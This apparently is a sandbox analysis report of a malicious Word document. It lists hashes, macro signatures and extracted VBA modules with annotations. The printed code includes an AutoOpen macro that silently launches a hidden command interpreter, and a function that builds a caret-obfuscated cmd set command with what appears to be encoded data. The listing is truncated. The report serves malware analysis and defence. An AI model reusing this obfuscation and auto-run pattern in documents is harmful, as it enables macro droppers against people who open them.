General

  • Target

    7bf9796a469fd9dc98b86fa95a206d28

  • Size

    79KB

  • MD5

    7bf9796a469fd9dc98b86fa95a206d28

  • SHA1

    9d099a838b4b9283aabf080f4c61ff744fb26ed3

  • SHA256

    1bc25579b4eca5466f6360a84d87508629512af3c1a8bba14d0a6d67933cf1f9

  • SHA512

    ad1d331edf77b66d9c5f1e55223ecbcd967aa74d0a9578cd34d8e51661a5c3e6b71eede43a45869873e3066f6f1ed786f9a460c0d84914afc68afafe34ba3a3d

  • SSDEEP

    1536:am15g1jS2Xwr+5U6Hsg6aZAO/f4Sm6eh:QlNu+5yg6aZAW4d6

Malware Config

Signatures

  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro that runs automatically under specific conditions (for example, when the document is opened) - often malicious.

  • Suspicious Office macro 1 IoCs

    Office document equipped with macros.

Files

  • 7bf9796a469fd9dc98b86fa95a206d28
    .doc windows office2003

    AIIfUddBvsC

    1
    ' Module header only: the excerpt shows attribute lines and no procedures.
    ' VB_Base "1Normal.ThisDocument" is the header Word writes for the
    ' document's own class module (ThisDocument). The VB_Name value looks
    ' randomly generated - an inference from the name, not shown by the page.
    Attribute VB_Name = "AIIfUddBvsC"
    2
    Attribute VB_Base = "1Normal.ThisDocument"
    3
    Attribute VB_GlobalNameSpace = False
    4
    Attribute VB_Creatable = False
    5
    Attribute VB_PredeclaredId = True
    6
    Attribute VB_Exposed = True
    7
    Attribute VB_TemplateDerived = True
    8
    Attribute VB_Customizable = True
    9

    mTDiVPJjjQLbi

    1
    Attribute VB_Name = "mTDiVPJjjQLbi"
    2
    ' BilUK: assembles a fragment of a command-line string. The listing stops
    ' after line 10, so the rest of the body and the value the function
    ' returns are not visible here.
    Function BilUK()
    3
    4
    ' The next four physical lines are the single statement
    ' "On Error Resume Next", split with line continuations. From here on,
    ' run-time errors are skipped silently instead of halting the macro.
    On _
    5
    Error _
    6
    Resume _
    7
    Next
    8
    ' Hour() applied to variables that are never assigned in the visible
    ' excerpt - looks like junk padding; any resulting error is swallowed
    ' by the handler above.
    Hour QhZtCM / tLnNz
    9
    ' Concatenation of short literals, with Chr(2+5+3+2+22) = Chr(34), a
    ' double quote. Joined, the text begins: md /V:^ON/C"^s^e^t b^S^P=...
    ' "^" is the cmd.exe escape character (it splits keywords such as "set"),
    ' and /V:ON enables delayed variable expansion. The value being set
    ' appears to be encoded data; it is truncated, so the payload cannot be
    ' determined from this page.
    ' NOTE(review): the leading "md" presumably pairs with the "C" prepended
    ' by the caller's Shell call to form "Cmd" - confirm against the full macro.
    jiWFtrnizXl = "md /V:^" + "ON/C" + Chr(2 + 5 + 3 + 2 + 22) + "^" + "s^e^t " + "b^S" + "^P===" + "^A^" + "A^g^AAI" + "AACAg" + "AA^" + "I^A^AC" + "A^g^A^"
    10
    ' Same pattern as line 8: arithmetic on variables not assigned in the
    ' visible excerpt, apparently filler.
    Hour BKjIN / ClrlsQ * 92585 * rGnAz

    aPPnsUziqWni

    1
    Attribute VB_Name = "aPPnsUziqWni"
    2
    ' AutoOpen is the macro name Word runs automatically when the document is
    ' opened (if macros are enabled); this matches the report's "triggers on
    ' suspicious action" signature. The listing stops after line 10.
    Sub AutoOpen()
    3
    4
    ' "On Error Resume Next" split across four lines with continuations;
    ' errors in the statements below are suppressed.
    On _
    5
    Error _
    6
    Resume _
    7
    Next
    8
    ' Hour() calls on variables not assigned in the visible excerpt -
    ' apparently filler with no effect on the result.
    Hour hSOmj * dtMmfB
    9
    Hour 93201 / WaoLC
    10
    ' Launches an external process. ChrW(9+12+3+3+40) = ChrW(67) = "C"; the
    ' remaining operands are BilUK()'s return value plus variables that are
    ' not assigned in the visible excerpt (presumably empty strings - confirm
    ' against the full macro). The second argument evaluates to 0 (vbHide),
    ' so the process window is hidden.
    ' Defender note: if the command resolves to cmd.exe as the fragments
    ' suggest, the observable is WINWORD.EXE spawning a hidden command
    ' interpreter; blocking Office child processes or disabling macros for
    ' untrusted documents prevents this step.
    Shell ChrW(9 + 12 + 3 + 3 + 40) + jthWXDrGqUGD + RHcNjtmYcw + BilUK + SfKPDNq + nlpnwJ + WTuZLuPIG + XUfvzkLYO + uXiihrLihsCRFp + pjfsrzJjipd, 818128045 - 818128045
